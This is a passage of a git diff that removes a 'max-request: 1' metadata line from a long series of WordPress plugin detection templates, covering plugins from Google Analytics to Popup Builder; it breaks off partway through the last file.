forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 539d9f7cec..daf205789d 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: - max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index f4123bb594..22bfa3ffe2 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: - max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 254f916291..7ed171d662 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: - max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 8074ac337e..ad238445fc 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: - max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b9de0ee313..7161671960 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: - max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 7b0f188ff7..2678f603c6 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: - max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 898e4de56d..20d947a5d1 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: - max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 4a76856a69..22ee97b51f 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: - max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index b321ca63eb..3f4c6c8936 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: - max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 2b42c9f80c..fa1bb64115 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: - max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml index 2409c6b370..a8eca7b056 100644 --- a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml +++ b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-and-footer-scripts/ metadata: - max-request: 1 plugin_namespace: header-and-footer-scripts wpscan: https://wpscan.com/plugin/header-and-footer-scripts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index dbea07a6da..da63d1cbf6 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: - max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 17a8f220cf..f94e7f6494 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: - max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 956a08b32d..95d2aa5f16 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: - max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 5a570b9077..af8193b875 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: - max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 4ecac0cd92..8d7e45818b 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: - max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index e50f58cef8..ed3967db7b 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: - max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 031bb48563..2ff5adba86 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: - max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 3cdcf3da93..9099f3c0a5 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: - max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index c222bc9d4a..1ee0e67542 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: - max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index c8acf8c625..43cb2ab09c 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: - max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 66b7d6a363..7ba81036cf 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: - max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index a36016562d..24fc3e3295 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: - max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 8033aacbc6..3e89505574 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/jetpack-boost/ metadata: - max-request: 1 plugin_namespace: jetpack-boost wpscan: https://wpscan.com/plugin/jetpack-boost tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e4017b1a0a..e701e365ba 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: - max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 53d6d393bd..c0cc5400a8 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: - max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index c286e9a14f..22687bcffe 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: - max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 364e3cd71e..b69d3d5bfe 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: - max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 4fcccbfc33..7975a57702 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 3fbc714d3b..ff4cef94d7 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index c49b506979..a8903697b0 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: - max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index dfcaf6f71b..3f141c4476 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: - max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 61be246fee..5355e988a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: - max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 1c16a72d76..6f06b49011 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: - max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 50d2e6630b..53d409fb68 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 8d71f7bde9..0e908a9580 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 5e1f97086e..aeb1875c57 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: - max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index d87d456a8c..7c15702305 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: - max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index aa9153241e..5ce87e6c71 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: - max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 09641796a3..c342e6b45a 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: - max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 28b70d09bf..e95041f555 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: - max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index b43c10ed7a..879a0d1c12 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: - max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index eb7e78bc7f..985f5d373a 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: - max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 3da2ea50e1..bbc305b8de 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: - max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7a58c58f63..7e3e4e2d7e 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: - max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 5f99b8cac8..17ea142c46 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: - max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index b08876df04..953e4ab3d8 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: - max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 3f68dffe06..92107fa69c 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: - max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 34f9bde1d6..5e1fe4ef5c 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: - max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d9f645328f..74fb3e6010 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: - max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 8a1196fc9f..b9f70ba555 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: - max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 05025452b7..6486c02c9a 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: - max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 1db1b57708..81f58198d3 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: - max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index dafe6974f6..3743307dbc 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: - max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index ba05fb1e16..a4c6980041 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: - max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 7f98d822a8..adf3387ddb 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: - max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 89602f4264..eb6e1aaa5d 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: - max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index 2f6513ca42..b3c83cd0bf 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: - max-request: 1 plugin_namespace: 